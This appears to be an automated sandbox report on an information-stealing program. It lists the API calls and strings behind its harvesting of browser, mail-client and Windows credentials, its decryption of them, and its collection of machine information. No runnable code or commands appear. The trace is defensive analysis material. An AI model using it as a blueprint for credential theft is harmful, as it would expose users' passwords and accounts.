                                                          • LoadLibraryW.KERNEL32(0047D4D8), ref: 00293A34
                                                          • _memcmp.LIBVCRUNTIME ref: 00293C60
                                                          • lstrlenW.KERNEL32(?), ref: 00293C73
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00293C8E
                                                          • lstrlenW.KERNEL32(?), ref: 00293C9B
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00293CBA
                                                          • lstrlenW.KERNEL32(?), ref: 00293CC7
                                                          • lstrcpyW.KERNEL32(00000000,-00000020), ref: 00293CEB
                                                          • lstrlenW.KERNEL32(?), ref: 00293D1F
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 00293D40
                                                          • StrStrIW.SHLWAPI(?,0047D4F4), ref: 00293E57
                                                          • lstrlenW.KERNEL32(00000000), ref: 00293E62
                                                          • lstrlenW.KERNEL32(?), ref: 00293E72
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00293F00
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrlen$lstrcpy$Library$FreeLoadVersion_memcmp
                                                          • String ID:
                                                          • API String ID: 2958638873-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004365E6
                                                            • Part of subcall function 00436208: __EH_prolog.LIBCMT ref: 0043620D
                                                            • Part of subcall function 00436208: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020119,?), ref: 004362AB
                                                            • Part of subcall function 00436208: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?), ref: 004362F9
                                                            • Part of subcall function 00436208: RegCloseKey.ADVAPI32(?), ref: 00436302
                                                          • _strftime.LIBCMT ref: 004366C1
                                                          • GetUserDefaultLCID.KERNEL32(00001001,?,00000100), ref: 004366E9
                                                          • GetLocaleInfoA.KERNEL32(00000000), ref: 004366F0
                                                            • Part of subcall function 00437F5A: __EH_prolog.LIBCMT ref: 00437F5F
                                                            • Part of subcall function 00434A6B: GetEnvironmentVariableA.KERNEL32(?,?,00000104,00000000), ref: 00434AB7
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 0040FBA4: __EH_prolog.LIBCMT ref: 0040FBA9
                                                          • GetUserNameA.ADVAPI32(?,00000101), ref: 00436937
                                                            • Part of subcall function 00437819: __EH_prolog.LIBCMT ref: 0043781E
                                                            • Part of subcall function 00437819: RegOpenKeyExA.KERNEL32(80000002,?,00000000,00020119,?,?,00000000,00000000), ref: 0043789F
                                                            • Part of subcall function 00437819: RegQueryValueExA.KERNEL32(?,?,00000000,?,?,00000040), ref: 004378EE
                                                            • Part of subcall function 00437819: RegCloseKey.ADVAPI32(?), ref: 0043790F
                                                          • GetComputerNameA.KERNEL32(?,00000101), ref: 00436FCA
                                                          • GetUserNameA.ADVAPI32(?,00000101), ref: 0043703F
                                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,00000001), ref: 00437372
                                                          • GlobalMemoryStatusEx.KERNEL32(?,?,?,00000001), ref: 0043746B
                                                          • GetSystemMetrics.USER32 ref: 004375DE
                                                          • GetSystemMetrics.USER32 ref: 00437608
                                                          • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 00437694
                                                          • EnumDisplayDevicesA.USER32(00000000,00000000,000001A8,00000000), ref: 004376EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$NameSystemUser$CloseDevicesDisplayEnumInfoMetricsOpenQueryValue$ComputerDefaultEnvironmentGlobalLocaleMemoryStatusVariable_strcat_strftime
                                                          • String ID: %Y.%m.%d - %X$0$2$5$@$Wed Oct 28 15:17:34 2020$machineinfo.txt
                                                          • API String ID: 2053319943-1214669571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040A758
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A7B2
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A7F6
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A844
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A891
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A8DB
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A925
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040A968
                                                          • GetProcAddress.KERNEL32(?,8E8B9694), ref: 0040A9B3
                                                          • wsprintfA.USER32 ref: 0040AA26
                                                            • Part of subcall function 0043464E: __EH_prolog.LIBCMT ref: 00434653
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040B277
                                                          • LocalFree.KERNEL32(?,?,?), ref: 0040B2DF
                                                          • LocalFree.KERNEL32(?), ref: 0040B3A6
                                                            • Part of subcall function 0040908B: __EH_prolog.LIBCMT ref: 00409090
                                                            • Part of subcall function 0040908B: BCryptOpenAlgorithmProvider.BCRYPT(?,AES,00000000,00000000), ref: 004090F6
                                                            • Part of subcall function 0040908B: BCryptSetProperty.BCRYPT(?,ChainingMode,ChainingModeGCM,00000020,00000000), ref: 00409114
                                                            • Part of subcall function 0040908B: BCryptGenerateSymmetricKey.BCRYPT(?,00000010,00000000,00000000,?,00000020,00000000), ref: 00409135
                                                            • Part of subcall function 0040908B: LocalAlloc.KERNEL32(00000040,?), ref: 0040918C
                                                            • Part of subcall function 0040908B: BCryptDecrypt.BCRYPT(00000010,?,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004091B7
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040B362
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$Crypt$H_prolog$Local$DataDeallocateFreeUnprotect$AlgorithmAllocDecryptGenerateOpenPropertyProviderSymmetric_strcatwsprintf
                                                          • String ID: "},$360Browser$Opera$UCBrowser$v10
                                                          • API String ID: 3815792202-3198395839
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00293651
                                                          • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,?), ref: 00293672
                                                          • lstrlenW.KERNEL32 ref: 00293681
                                                          • CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 00293694
                                                          • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,00000000), ref: 002936B7
                                                          • wsprintfW.USER32 ref: 002936F3
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 00293701
                                                          • wsprintfW.USER32 ref: 00293721
                                                          • lstrcatW.KERNEL32(00000000,?), ref: 0029372F
                                                          • CryptDestroyHash.ADVAPI32(?,?,00000000,00000000), ref: 00293738
                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00293743
                                                          • lstrlenW.KERNEL32 ref: 0029378A
                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000001,?), ref: 002937AD
                                                          • LocalFree.KERNEL32(00000000), ref: 002937E6
                                                          Strings
                                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 0029375D
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Crypt$Hash$ContextDatalstrcatlstrlenwsprintf$AcquireCreateDestroyFreeLocalParamReleaseUnprotect
                                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                          • API String ID: 1004607082-680441574
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 002A497B: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 002A49C3
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 002A49E2
                                                            • Part of subcall function 002A497B: RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 002A4A1D
                                                            • Part of subcall function 002A497B: RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 002A4A3E
                                                          • CryptUnprotectData.CRYPT32(0047DD20,00000000,00000000,00000000,00000000,00000001,?), ref: 002A3E5F
                                                          • LocalFree.KERNEL32(?), ref: 002A3E97
                                                          • lstrlenW.KERNEL32(POP3 Password), ref: 002A3EA4
                                                          • lstrlenW.KERNEL32(00000001), ref: 002A3EC8
                                                          • lstrlenW.KERNEL32(POP3 Port), ref: 002A3F49
                                                          • wsprintfA.USER32 ref: 002A3F75
                                                          • lstrlen.KERNEL32(?), ref: 002A3F82
                                                          • lstrlenW.KERNEL32(?), ref: 002A3CF7
                                                            • Part of subcall function 002B56E1: _free.LIBCMT ref: 002B56F4
                                                          • lstrlenW.KERNEL32(SMTP Email Address), ref: 002A3CD3
                                                            • Part of subcall function 002A4A6E: lstrlen.KERNEL32(?,?,0046C15C), ref: 002A4A9F
                                                            • Part of subcall function 002A4A6E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4ABE
                                                            • Part of subcall function 002A4A6E: lstrcpy.KERNEL32(00000000,?), ref: 002A4AE1
                                                            • Part of subcall function 002A4A6E: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0047913B,00000000,00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,0046C15C), ref: 002A4B0D
                                                            • Part of subcall function 002A4B2B: lstrlen.KERNEL32(?,?,?,?,?,?,?,002932D4,00000001,?,0047D3C4,00000006,?,0047D39C,00000012), ref: 002A4B50
                                                            • Part of subcall function 002A4B2B: lstrcpy.KERNEL32(00000000,?), ref: 002A4B77
                                                          • lstrlenW.KERNEL32(POP3 Password2), ref: 002A3D76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: lstrlen$ByteCharMultiQueryValueWidelstrcpy$CloseCryptDataFreeLocalOpenUnprotect_freewsprintf
                                                          • String ID: POP3 Password$POP3 Password2$POP3 Port$SMTP Email Address
                                                          • API String ID: 2832241015-1679095740
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027A9A8
                                                          • wsprintfA.USER32 ref: 0027AC76
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027AD71
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027AD88
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027B16D
                                                            • Part of subcall function 002A489E: __EH_prolog.LIBCMT ref: 002A48A3
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027B4C7
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0027B52F
                                                          • LocalFree.KERNEL32(?), ref: 0027B5F6
                                                            • Part of subcall function 002792DB: __EH_prolog.LIBCMT ref: 002792E0
                                                            • Part of subcall function 002792DB: LocalAlloc.KERNEL32(00000040,?), ref: 002793DC
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027B5B2
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Local_wcsstr$CryptDataDeallocateFreeUnprotect$Allocwsprintf
                                                          • String ID: "},$v10
                                                          • API String ID: 3833138694-3916116036
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0027BA86
                                                          • wsprintfA.USER32 ref: 0027BCD4
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027BE0C
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027BE21
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027C033
                                                            • Part of subcall function 002A489E: __EH_prolog.LIBCMT ref: 002A48A3
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027C35D
                                                          • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0027C3BF
                                                          • LocalFree.KERNEL32(?), ref: 0027C480
                                                            • Part of subcall function 002792DB: __EH_prolog.LIBCMT ref: 002792E0
                                                            • Part of subcall function 002792DB: LocalAlloc.KERNEL32(00000040,?), ref: 002793DC
                                                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0027C43C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prologLocal_wcsstr$CryptDataDeallocateFreeUnprotect$Allocwsprintf
                                                          • String ID: "},$v10
                                                          • API String ID: 276673488-3916116036
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00294500
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00294616
                                                          • CloseHandle.KERNEL32(00000000), ref: 00294624
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00294660
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00294689
                                                          • CloseHandle.KERNEL32(00000000), ref: 00294690
                                                            • Part of subcall function 00279182: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 002791AC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteH_prologReadSizeTransacted
                                                          • String ID: *(,+$.f|$=534$qk
                                                          • API String ID: 169828681-1410984133
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 004242B0
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004243C6
                                                          • CloseHandle.KERNEL32(00000000), ref: 004243D4
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00424410
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00424439
                                                          • CloseHandle.KERNEL32(00000000), ref: 00424440
                                                            • Part of subcall function 00408F32: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,?,?,0000000F,00000000,00408E93), ref: 00408F45
                                                            • Part of subcall function 00408F32: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 00408F5C
                                                            • Part of subcall function 00408F32: CommitTransaction.KTMW32(00000000,?,00000000,?,?,?,?,0000000F,00000000,00408E93,?,?,?,00414AC4,00000000), ref: 00408F67
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTransaction$CommitDeleteH_prologReadSizeTransacted
                                                          • String ID: *(,+$.f|$=534$qk
                                                          • API String ID: 604483397-1410984133
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0040C49D
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C4E8
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C51A
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C559
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C591
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C5C6
                                                          • GetProcAddress.KERNEL32(?,?), ref: 0040C5F7
                                                          • GetProcAddress.KERNEL32(?,F2EFED61), ref: 0040C639
                                                          • wsprintfA.USER32 ref: 0040C69A
                                                            • Part of subcall function 0040EDCE: __EH_prolog.LIBCMT ref: 0040EDD3
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                            • Part of subcall function 0040CB20: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0040CB4E
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: AddressProc$H_prolog$DeallocateIos_base_dtorstd::ios_base::_wsprintf
                                                          • String ID:
                                                          • API String ID: 3613913591-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0041A6B8
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041A6ED
                                                            • Part of subcall function 004345D2: __EH_prolog.LIBCMT ref: 004345D7
                                                            • Part of subcall function 004345D2: _strcat.LIBCMT ref: 0043462F
                                                            • Part of subcall function 00408ADD: __EH_prolog.LIBCMT ref: 00408AE2
                                                            • Part of subcall function 0040EF21: _Deallocate.LIBCONCRT ref: 0040EF36
                                                            • Part of subcall function 00408DDD: ___std_fs_copy_file@12.LIBCPMT ref: 00408E01
                                                            • Part of subcall function 0040F13E: _Deallocate.LIBCONCRT ref: 0040F14D
                                                          • __fread_nolock.LIBCMT ref: 0041B0C2
                                                            • Part of subcall function 004206EE: __EH_prolog.LIBCMT ref: 004206F3
                                                            • Part of subcall function 0041E9E3: __EH_prolog.LIBCMT ref: 0041E9E8
                                                            • Part of subcall function 0041EA6B: __EH_prolog.LIBCMT ref: 0041EA70
                                                            • Part of subcall function 0041A507: __EH_prolog.LIBCMT ref: 0041A50C
                                                            • Part of subcall function 0041A507: _strlen.LIBCMT ref: 0041A579
                                                            • Part of subcall function 0041A507: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0041A581
                                                            • Part of subcall function 00434DC9: __EH_prolog.LIBCMT ref: 00434DCE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$BinaryCryptFolderPathString___std_fs_copy_file@12__fread_nolock_strcat_strlen
                                                          • String ID: %$Profiles$ThunderBird$logins
                                                          • API String ID: 684813540-3248300823
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00279FA7
                                                          • wsprintfA.USER32 ref: 0027A1B4
                                                          • _wcsstr.LIBVCRUNTIME ref: 0027A48B
                                                            • Part of subcall function 00279182: DeleteFileTransactedA.KERNEL32(?,00000000), ref: 002791AC
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 00279F61: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00279F8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: DeallocateDeleteFileH_prologIos_base_dtorTransacted_wcsstrstd::ios_base::_wsprintf
                                                          • String ID: "},$v10
                                                          • API String ID: 3443179243-3916116036
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: /$UT
                                                          • API String ID: 0-1626504983
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00456C2B: GetLastError.KERNEL32(?,00000000,?,00444551,00000000,00000000,?,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456C30
                                                            • Part of subcall function 00456C2B: SetLastError.KERNEL32(00000000,00000006,000000FF,?,004509FC,00000000,00000000,00000000,00000000,?), ref: 00456CCE
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456C8D
                                                            • Part of subcall function 00456C2B: _free.LIBCMT ref: 00456CC3
                                                          • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 004627FE
                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00462847
                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00462856
                                                          • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0046289E
                                                          • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 004628BD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                          • String ID: P6G
                                                          • API String ID: 949163717-4065964772
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CredEnumerateW.ADVAPI32(0047D4AC,00000000,?,?), ref: 0029385F
                                                          • CryptUnprotectData.CRYPT32(?,00000000,0000004A,00000000,00000000,00000001,?), ref: 002938A5
                                                          • LocalFree.KERNEL32(?), ref: 002938CF
                                                          • AuditFree.ADVAPI32(?), ref: 002938E8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: Free$AuditCredCryptDataEnumerateLocalUnprotect
                                                          • String ID: J$abe2869f-9b47-4cd9-a358-c22904dba7f7
                                                          • API String ID: 1896015943-3474744795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,;(F,00000002,00000000,?,?,?,0046283B,?,00000000), ref: 004625B6
                                                          • GetLocaleInfoW.KERNEL32(?,20001004,;(F,00000002,00000000,?,?,?,0046283B,?,00000000), ref: 004625DF
                                                          • GetACP.KERNEL32(?,?,0046283B,?,00000000), ref: 004625F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: ;(F$ACP$OCP
                                                          • API String ID: 2299586839-1543003859
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00281AC3
                                                            • Part of subcall function 00285B8A: _memcmp.LIBVCRUNTIME ref: 00285BAE
                                                          • GetDriveTypeA.KERNEL32(?,?,?,0047913B,0047913B), ref: 00281D09
                                                            • Part of subcall function 002816AD: ___std_fs_get_stats@16.LIBCPMT ref: 002816CD
                                                            • Part of subcall function 00281A09: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00281A45
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 002A4CBB: GetEnvironmentVariableA.KERNEL32(00000000,?,00000104,00000000), ref: 002A4D07
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$CopyDriveEnvironmentFileTransactedTypeVariable___std_fs_get_stats@16_memcmp
                                                          • String ID: $0$C
                                                          • API String ID: 1071132504-317060204
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: __floor_pentium4
                                                          • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                          • API String ID: 4168288129-2761157908
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0028A908
                                                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0028A93D
                                                            • Part of subcall function 002A4822: __EH_prolog.LIBCMT ref: 002A4827
                                                            • Part of subcall function 00278D2D: __EH_prolog.LIBCMT ref: 00278D32
                                                            • Part of subcall function 0027F171: _Deallocate.LIBCONCRT ref: 0027F186
                                                            • Part of subcall function 0027902D: ___std_fs_copy_file@12.LIBCPMT ref: 00279051
                                                            • Part of subcall function 0027F38E: _Deallocate.LIBCONCRT ref: 0027F39D
                                                          • __fread_nolock.LIBCMT ref: 0028B312
                                                            • Part of subcall function 0029093E: __EH_prolog.LIBCMT ref: 00290943
                                                            • Part of subcall function 0028EC33: __EH_prolog.LIBCMT ref: 0028EC38
                                                            • Part of subcall function 0028A757: __EH_prolog.LIBCMT ref: 0028A75C
                                                            • Part of subcall function 0028A757: _strlen.LIBCMT ref: 0028A7C9
                                                            • Part of subcall function 0028A757: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0028A7D1
                                                            • Part of subcall function 002A5019: __EH_prolog.LIBCMT ref: 002A501E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: H_prolog$Deallocate$BinaryCryptFolderPathString___std_fs_copy_file@12__fread_nolock_strlen
                                                          • String ID: %$Profiles
                                                          • API String ID: 1431793343-2189904706
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 002A49C3
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 002A49E2
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 002A4A1D
                                                          • RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 002A4A3E
                                                            • Part of subcall function 002B56E1: _free.LIBCMT ref: 002B56F4
                                                          Strings
                                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 002A49C1
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432517299.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen_free
                                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                          • API String ID: 3744367872-680441574
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Internet Explorer\IntelliForms\Storage2,00000000,00000100,00000100,?,00000000), ref: 00434773
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,?,00000000,00000000,?,00000000), ref: 00434792
                                                          • RegQueryValueExW.ADVAPI32(00000100,?,00000000,00000000,00000000,00000000,?,00000000), ref: 004347CD
                                                          • RegCloseKey.ADVAPI32(00000100,?,00000000), ref: 004347EE
                                                            • Part of subcall function 00445491: _free.LIBCMT ref: 004454A4
                                                          Strings
                                                          • Software\Microsoft\Internet Explorer\IntelliForms\Storage2, xrefs: 00434771
                                                          Memory Dump Source
                                                          • Source File: 00000018.00000002.2432653956.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Similarity
                                                          • API ID: QueryValue$CloseOpen_free
                                                          • String ID: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
                                                          • API String ID: 3744367872-680441574
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0043604F
                                                          • GetTimeZoneInformation.KERNEL32(?), ref: 0043606C
                                                            • Part of subcall function 0040EEB0: __EH_prolog.LIBCMT ref: 0040EEB5
                                                            • Part of subcall function 0040F61A: __EH_prolog.LIBCMT ref: 0040F61F
